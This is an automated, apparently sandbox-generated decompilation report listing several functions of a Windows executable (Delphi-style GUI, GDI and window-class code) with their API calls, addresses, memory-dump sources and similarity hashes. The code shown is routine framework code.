				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x47a8ac; // 0x0
				SetPropA(_a4,  *0x496b7a & 0x0000ffff, _t27);
				_t31 =  *0x47a8ac; // 0x0
				SetPropA(_a4,  *0x496b78 & 0x0000ffff, _t31);
				_t35 =  *0x47a8ac; // 0x0
				 *0x47a8ac = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                                                                        0x004333dd
                                                                        0x004333e0
                                                                        0x004333e8
                                                                        0x004333ee
                                                                        0x00433400
                                                                        0x00433415
                                                                        0x00433430
                                                                        0x00433430
                                                                        0x00433435
                                                                        0x00433447
                                                                        0x0043344c
                                                                        0x0043345e
                                                                        0x0043346f
                                                                        0x00433474
                                                                        0x00433484
                                                                        0x0043348c

                                                                        APIs
                                                                        • SetWindowLongA.USER32 ref: 00433400
                                                                        • GetWindowLongA.USER32 ref: 0043340B
                                                                        • GetWindowLongA.USER32 ref: 0043341D
                                                                        • SetWindowLongA.USER32 ref: 00433430
                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 00433447
                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 0043345E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: LongWindow$Prop
                                                                        • String ID:
                                                                        • API String ID: 3887896539-0
                                                                        • Opcode ID: a2b974559dbee0a756eb0a72755d0049ae3fa082466c9d19223a96232c7cdb99
                                                                        • Instruction ID: 2f816502963edffd2a2e0b87a7de9d57cd36cbe0b36d5e0b22d0fd463ea8592c
                                                                        • Opcode Fuzzy Hash: a2b974559dbee0a756eb0a72755d0049ae3fa082466c9d19223a96232c7cdb99
                                                                        • Instruction Fuzzy Hash: EF112CB5504104BFDB10EF9DDC84E9A37E8AF08320F118222B918CB3A1D738E9508B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421218, Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E00421218(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E004029BC(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L00406AE4();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E00421180(_t32) == 0) {
						E00421010( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L00406B0C();
					_t31 = _t15;
				}
				return _t31;
			}













                                                                        0x00421223
                                                                        0x00421225
                                                                        0x0042122d
                                                                        0x00421267
                                                                        0x00421275
                                                                        0x0042122f
                                                                        0x0042122f
                                                                        0x00421231
                                                                        0x00421236
                                                                        0x0042123a
                                                                        0x00421253
                                                                        0x0042125a
                                                                        0x00421260
                                                                        0x00421260
                                                                        0x00421280
                                                                        0x00421288
                                                                        0x0042129e
                                                                        0x0042129e
                                                                        0x004212a3
                                                                        0x004212a5
                                                                        0x004212a6
                                                                        0x004212ab
                                                                        0x004212ab
                                                                        0x004212b8

                                                                        APIs
                                                                        • 72E7A590.GDI32(00000000,00000000,?,?,00424C7F,?,?,?,?,0042378B,00000000,00423817), ref: 00421231
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042123A
                                                                        • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00424C7F,?,?,?,?,0042378B), ref: 0042124E
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042125A
                                                                        • DeleteDC.GDI32(00000000), ref: 00421260
                                                                        • 72E7A8F0.GDI32(?,00000000,?,?,00424C7F,?,?,?,?,0042378B,00000000,00423817), ref: 004212A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ObjectSelect$A590ColorDeleteTable
                                                                        • String ID:
                                                                        • API String ID: 1056449717-0
                                                                        • Opcode ID: 81d7ffad105dc184113cb8e1208da88902fd7a3f35f1a0a900b9a518896e1975
                                                                        • Instruction ID: 6233c2232071ce45a9a25d117bab58e91d046375a4003aa02fa61980a1f905b8
                                                                        • Opcode Fuzzy Hash: 81d7ffad105dc184113cb8e1208da88902fd7a3f35f1a0a900b9a518896e1975
                                                                        • Instruction Fuzzy Hash: 3F01D66170832062E610B76AAC43F6B72F8CFC0758F05C82FB585E72D1E67C8844836A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045BE40, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0045BE40(void* __eax) {
				struct tagRECT _v20;
				struct HWND__* _t18;
				void* _t29;
				RECT* _t30;

				_t29 = __eax;
				ValidateRect(E0043CC2C(__eax), 0);
				InvalidateRect(E0043CC2C(_t29), 0, 0xffffffff);
				GetClientRect(E0043CC2C(_t29), _t30);
				_t18 = E0043CC2C( *((intOrPtr*)(_t29 + 0x240)));
				MapWindowPoints(E0043CC2C(_t29), _t18,  &_v20, 2);
				ValidateRect(E0043CC2C( *((intOrPtr*)(_t29 + 0x240))), _t30);
				return InvalidateRect(E0043CC2C( *((intOrPtr*)(_t29 + 0x240))),  &_v20, 0);
			}







                                                                        0x0045be44
                                                                        0x0045be50
                                                                        0x0045be61
                                                                        0x0045be6f
                                                                        0x0045be81
                                                                        0x0045be8f
                                                                        0x0045bea1
                                                                        0x0045bec2

                                                                        APIs
                                                                        • ValidateRect.USER32(00000000,00000000,0045C694), ref: 0045BE50
                                                                        • InvalidateRect.USER32(00000000,00000000,000000FF,00000000,00000000,0045C694), ref: 0045BE61
                                                                        • GetClientRect.USER32 ref: 0045BE6F
                                                                        • MapWindowPoints.USER32 ref: 0045BE8F
                                                                        • ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000,0045C694), ref: 0045BEA1
                                                                        • InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 0045BEB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Rect$InvalidateValidate$ClientPointsWindow
                                                                        • String ID:
                                                                        • API String ID: 2846033224-0
                                                                        • Opcode ID: bc3c1dfb15d199b855847963ceb94e7d1f8871a39bc5f5e14a9b6d9568782abb
                                                                        • Instruction ID: ea2dbad194b2ebc7582b08bb91a9dba736990e92a686d62ef286bf12ff39715e
                                                                        • Opcode Fuzzy Hash: bc3c1dfb15d199b855847963ceb94e7d1f8871a39bc5f5e14a9b6d9568782abb
                                                                        • Instruction Fuzzy Hash: E1F0C960A5430066EA00BA7A8DC7F4B768D9B0C718F002D7A7518FB2C3C93DEC05476A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004208FC, Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004208FC(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041FC84( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041FC84( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041FD64( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041EFA4(E0041FC48( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041EFA4(E0041FC48( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}




                                                                        0x004208fd
                                                                        0x00420908
                                                                        0x0042091a
                                                                        0x00420929
                                                                        0x00420963
                                                                        0x00420974
                                                                        0x0042092b
                                                                        0x0042093d
                                                                        0x0042094e
                                                                        0x0042094e

                                                                        APIs
                                                                          • Part of subcall function 0041FC84: CreateBrushIndirect.GDI32(?), ref: 0041FD2E
                                                                        • UnrealizeObject.GDI32(00000000), ref: 00420908
                                                                        • SelectObject.GDI32(?,00000000), ref: 0042091A
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0042093D
                                                                        • SetBkMode.GDI32(?,00000002), ref: 00420948
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00420963
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0042096E
                                                                          • Part of subcall function 0041EFA4: GetSysColor.USER32(?), ref: 0041EFAE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                        • String ID:
                                                                        • API String ID: 3527656728-0
                                                                        • Opcode ID: 2e9304bb39e578ed7576aeaf7fa11be73435d8f21738a1c2794cb36238e8a360
                                                                        • Instruction ID: 33fc0b801b1a1cbcb5887307af3aaa8169cec276aa49de2580deb539fc8c3729
                                                                        • Opcode Fuzzy Hash: 2e9304bb39e578ed7576aeaf7fa11be73435d8f21738a1c2794cb36238e8a360
                                                                        • Instruction Fuzzy Hash: DCF0BBB52041009BEF04FFBADAC794B67A8AF44309700806ABD89DF197CA29D8659739
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00471C3C, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E00471C3C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t46;
				int _t56;
				void* _t68;
				void* _t71;
				void* _t85;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t97;
				intOrPtr _t102;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_v28 = 0;
				_t110 = __edx;
				_t85 = __eax;
				_push(_t113);
				_push(0x471e1a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xffffffe8;
				if(__edx == 0) {
					L8:
					if( *((intOrPtr*)(_t85 + 0x20c)) == 0) {
						L12:
						if(_t110 != 0 &&  *((intOrPtr*)(_t110 + 0x30)) ==  *((intOrPtr*)(_t85 + 0x30))) {
							_t92 =  *0x46af2c; // 0x46af78
							if(E00403768(_t110, _t92) == 0) {
								_t93 =  *0x46ab14; // 0x46ab60
								if(E00403768(_t110, _t93) == 0) {
									_t94 =  *0x46c2d8; // 0x46c324
									if(E00403768(_t110, _t94) == 0 && E00471C0C(E00403524(_t110), "TDBEdit") == 0 && E00471C0C(E00403524(_t110), "TDBMemo") == 0) {
										_t46 = E0043CF30(_t85);
										_t132 = _t46;
										if(_t46 != 0) {
											E00471E48(_t85, _t110, _t132);
											_t56 = E0043CC2C(_t110);
											SendMessageA(E0043CC2C(_t85), 0x469, _t56, 0);
										}
										 *((intOrPtr*)(_t85 + 0x20c)) = _t110;
										_t97 =  *0x429ec4; // 0x429f10
										if(E00403768(_t110, _t97) != 0) {
											E00408720( *((short*)(_t85 + 0x21c)),  &_v28);
											E004365DC(_t110, _t85, _v28, _t110);
										}
									}
								}
							}
						}
						_pop(_t91);
						 *[fs:eax] = _t91;
						_push(0x471e21);
						return E00404348( &_v28);
					}
					if(E0043CF30(_t85) != 0) {
						SendMessageA(E0043CC2C(_t85), 0x469, 0, 0);
					}
					 *((intOrPtr*)(_t85 + 0x20c)) = 0;
					goto L12;
				}
				_t68 = E00439AB4( *((intOrPtr*)(__eax + 0x30))) - 1;
				if(_t68 >= 0) {
					_v8 = _t68 + 1;
					_t108 = 0;
					do {
						_t71 = E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108);
						_t102 =  *0x46af2c; // 0x46af78
						if(E00403768(_t71, _t102) != 0 && _t85 != E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108) && _t110 ==  *((intOrPtr*)(E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108) + 0x20c))) {
							_v24 =  *((intOrPtr*)(_t110 + 8));
							_v20 = 0xb;
							_v16 =  *((intOrPtr*)(E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108) + 8));
							_v12 = 0xb;
							_t89 =  *0x495c08; // 0x468cbc
							E0040A274(_t85, _t89, 1, _t108, _t110, 1,  &_v24);
							E00403DA8();
						}
						_t108 = _t108 + 1;
						_t16 =  &_v8;
						 *_t16 = _v8 - 1;
					} while ( *_t16 != 0);
				}
			}
























                                                                        0x00471c47
                                                                        0x00471c4a
                                                                        0x00471c4c
                                                                        0x00471c50
                                                                        0x00471c51
                                                                        0x00471c56
                                                                        0x00471c59
                                                                        0x00471c5e
                                                                        0x00471cf5
                                                                        0x00471cfc
                                                                        0x00471d27
                                                                        0x00471d29
                                                                        0x00471d3d
                                                                        0x00471d4a
                                                                        0x00471d52
                                                                        0x00471d5f
                                                                        0x00471d67
                                                                        0x00471d74
                                                                        0x00471da6
                                                                        0x00471dab
                                                                        0x00471dad
                                                                        0x00471db3
                                                                        0x00471dbc
                                                                        0x00471dcf
                                                                        0x00471dcf
                                                                        0x00471dd4
                                                                        0x00471ddc
                                                                        0x00471de9
                                                                        0x00471df5
                                                                        0x00471dff
                                                                        0x00471dff
                                                                        0x00471de9
                                                                        0x00471d74
                                                                        0x00471d5f
                                                                        0x00471d4a
                                                                        0x00471e06
                                                                        0x00471e09
                                                                        0x00471e0c
                                                                        0x00471e19
                                                                        0x00471e19
                                                                        0x00471d07
                                                                        0x00471d1a
                                                                        0x00471d1a
                                                                        0x00471d21
                                                                        0x00000000
                                                                        0x00471d21
                                                                        0x00471c6c
                                                                        0x00471c6f
                                                                        0x00471c76
                                                                        0x00471c79
                                                                        0x00471c7b
                                                                        0x00471c80
                                                                        0x00471c85
                                                                        0x00471c92
                                                                        0x00471cb7
                                                                        0x00471cba
                                                                        0x00471ccb
                                                                        0x00471cce
                                                                        0x00471cd8
                                                                        0x00471ce5
                                                                        0x00471cea
                                                                        0x00471cea
                                                                        0x00471cef
                                                                        0x00471cf0
                                                                        0x00471cf0
                                                                        0x00471cf0
                                                                        0x00471c7b

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: x@$TDBEdit$TDBMemo
                                                                        • API String ID: 3850602802-3284963328
                                                                        • Opcode ID: 5787c22cd92ee096d9780655317fffe5fa6868f4420593c71e48df5261de8e88
                                                                        • Instruction ID: d5e860475c8fb5d570ea0d8d9322d81bf70e85d28bf0087e7759142a1a5dafb3
                                                                        • Opcode Fuzzy Hash: 5787c22cd92ee096d9780655317fffe5fa6868f4420593c71e48df5261de8e88
                                                                        • Instruction Fuzzy Hash: D34190707002405BCB10FF6EC98269A77A9AF44709F60957BEC48AB3A6C678DD05CB9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00439D3C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E00439D3C(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t47;
				void* _t48;
				intOrPtr _t75;
				intOrPtr _t93;
				intOrPtr _t97;
				void* _t98;
				intOrPtr* _t100;
				void* _t104;

				_t98 = __edi;
				_t83 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t100 = __eax;
				_push(_t104);
				_push(0x439ec7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t104 + 0xffffff40;
				_t84 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t100 + 0x174)) = _v108.lpfnWndProc;
					_t47 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t48 = _t47 + 1;
					if(_t48 == 0 || E004333D8 != _v184.lpfnWndProc) {
						if(_t48 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E004333D8;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040B330(_t83, _t84, _t98, _t100);
						}
					}
					 *0x47a8ac = _t100;
					_t85 =  *_t100;
					 *((intOrPtr*)( *_t100 + 0x9c))();
					if( *((intOrPtr*)(_t100 + 0x180)) == 0) {
						E0040B330(_t83, _t85, _t98, _t100);
					}
					E00408E50( *((intOrPtr*)(_t100 + 0x64)));
					 *((intOrPtr*)(_t100 + 0x64)) = 0;
					E0043CF3C(_t100);
					E00437760(_t100, E0041F478( *((intOrPtr*)(_t100 + 0x68)), _t83, _t85), 0x30, 1);
					_t117 =  *((char*)(_t100 + 0x5c));
					if( *((char*)(_t100 + 0x5c)) != 0) {
						E004037D8(_t100, _t117);
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(0x439ece);
					return E00404348( &_v196);
				} else {
					_t83 =  *((intOrPtr*)(__eax + 4));
					if(_t83 == 0 || ( *(_t83 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t100 + 8));
						_v188 = 0xb;
						_t75 =  *0x495b10; // 0x41d584
						E00406548(_t75,  &_v196);
						_t84 = _v196;
						E0040A1B8(_t83, _v196, 1, _t98, _t100, 0,  &_v192);
						E00403DA8();
					} else {
						_t97 =  *0x4323f0; // 0x43243c
						if(E00403768(_t83, _t97) == 0) {
							goto L6;
						}
						_v116 = E0043CC2C(_t83);
					}
					goto L7;
				}
			}




















                                                                        0x00439d3c
                                                                        0x00439d3c
                                                                        0x00439d45
                                                                        0x00439d49
                                                                        0x00439d4f
                                                                        0x00439d53
                                                                        0x00439d54
                                                                        0x00439d59
                                                                        0x00439d5c
                                                                        0x00439d67
                                                                        0x00439d69
                                                                        0x00439d73
                                                                        0x00439de8
                                                                        0x00439deb
                                                                        0x00439e00
                                                                        0x00439e08
                                                                        0x00439e0a
                                                                        0x00439e0d
                                                                        0x00439e1e
                                                                        0x00439e28
                                                                        0x00439e28
                                                                        0x00439e2d
                                                                        0x00439e37
                                                                        0x00439e46
                                                                        0x00439e48
                                                                        0x00439e48
                                                                        0x00439e46
                                                                        0x00439e4d
                                                                        0x00439e5b
                                                                        0x00439e5d
                                                                        0x00439e6a
                                                                        0x00439e6c
                                                                        0x00439e6c
                                                                        0x00439e74
                                                                        0x00439e7b
                                                                        0x00439e80
                                                                        0x00439e98
                                                                        0x00439e9d
                                                                        0x00439ea1
                                                                        0x00439ea9
                                                                        0x00439ea9
                                                                        0x00439eb0
                                                                        0x00439eb3
                                                                        0x00439eb6
                                                                        0x00439ec6
                                                                        0x00439d7e
                                                                        0x00439d7e
                                                                        0x00439d83
                                                                        0x00439da8
                                                                        0x00439dab
                                                                        0x00439db1
                                                                        0x00439dc7
                                                                        0x00439dcc
                                                                        0x00439dd1
                                                                        0x00439dde
                                                                        0x00439de3
                                                                        0x00439d8b
                                                                        0x00439d8d
                                                                        0x00439d9a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00439da3
                                                                        0x00439da3
                                                                        0x00000000
                                                                        0x00439d83

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Class$InfoRegisterUnregister
                                                                        • String ID: <$C$@
                                                                        • API String ID: 3749476976-2018183516
                                                                        • Opcode ID: f13af5d5012fe8f2965f5b7121bc98c74dca3209477202ed70a0ef0fc273b36d
                                                                        • Instruction ID: 2c6ec2fd4a1584ed8ef345fd1b634a2f873c5482398d3f71bf8bca164ddd66ba
                                                                        • Opcode Fuzzy Hash: f13af5d5012fe8f2965f5b7121bc98c74dca3209477202ed70a0ef0fc273b36d
                                                                        • Instruction Fuzzy Hash: 4D417E71A003189BDB20EB65CC42BDE77E9AF48304F4054BAE849E7391DB78AD45CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409F40, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00409F40(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;

				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L2:
					_t40 =  *0x496714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409F34(_t73);
					L4:
					E00408C5C( &_v273, 0x104, E0040ACE8(0x5c, _t89) + 1);
					_t74 = 0x40a0c0;
					_t86 = 0x40a0c0;
					_t83 =  *0x4077d4; // 0x407820
					if(E00403768(_t87, _t83) != 0) {
						_t74 = E004047F8( *((intOrPtr*)(_t87 + 4)));
						_t69 = E00408BF8(_t74, 0x40a0c0);
						if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
							_t86 = 0x40a0c4;
						}
					}
					_t51 =  *0x495c1c; // 0x407594
					_t16 = _t51 + 4; // 0xffe7
					_t53 =  *0x496714; // 0x400000
					LoadStringA(E00405AAC(_t53),  *_t16,  &_v790, 0x100);
					E0040352C( *_t87,  &_v1116);
					_v860 =  &_v1116;
					_v856 = 4;
					_v852 =  &_v273;
					_v848 = 6;
					_v844 = _v12;
					_v840 = 5;
					_v836 = _t74;
					_v832 = 6;
					_v828 = _t86;
					_v824 = 6;
					E0040932C(_v8,  &_v790, _a4, 4,  &_v860);
					return E00408BF8(_v8, _t86);
				}
				_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
				_t89 = _t72;
				if(_t72 != 0) {
					_t75 = _t73 - _v820.AllocationBase;
					__eflags = _t75;
					_v12 = _t75;
					goto L4;
				}
				goto L2;
			}
































                                                                        0x00409f4c
                                                                        0x00409f4f
                                                                        0x00409f51
                                                                        0x00409f5d
                                                                        0x00409f6c
                                                                        0x00409f8a
                                                                        0x00409f96
                                                                        0x00409f9c
                                                                        0x00409fa8
                                                                        0x00409fb6
                                                                        0x00409fd1
                                                                        0x00409fd6
                                                                        0x00409fdb
                                                                        0x00409fe2
                                                                        0x00409fef
                                                                        0x00409ff9
                                                                        0x00409ffd
                                                                        0x0040a004
                                                                        0x0040a00d
                                                                        0x0040a00d
                                                                        0x0040a004
                                                                        0x0040a01e
                                                                        0x0040a023
                                                                        0x0040a027
                                                                        0x0040a032
                                                                        0x0040a03f
                                                                        0x0040a04a
                                                                        0x0040a050
                                                                        0x0040a05d
                                                                        0x0040a063
                                                                        0x0040a06d
                                                                        0x0040a073
                                                                        0x0040a07a
                                                                        0x0040a080
                                                                        0x0040a087
                                                                        0x0040a08d
                                                                        0x0040a0a9
                                                                        0x0040a0bc
                                                                        0x0040a0bc
                                                                        0x00409f81
                                                                        0x00409f86
                                                                        0x00409f88
                                                                        0x00409fad
                                                                        0x00409fad
                                                                        0x00409fb3
                                                                        0x00000000
                                                                        0x00409fb3
                                                                        0x00000000

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F5D
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F81
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F9C
                                                                        • LoadStringA.USER32 ref: 0040A032
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                        • String ID: x@
                                                                        • API String ID: 3990497365-1446391196
                                                                        • Opcode ID: 675b2fcfc3af4e0b804cb0a88e9fa82d5beafd49b275f10cabf8e41c51dc7240
                                                                        • Instruction ID: 8b082e9917efa6b49bae10a68e7f34f77849aa4765b44cfb24a4ba26b6d89490
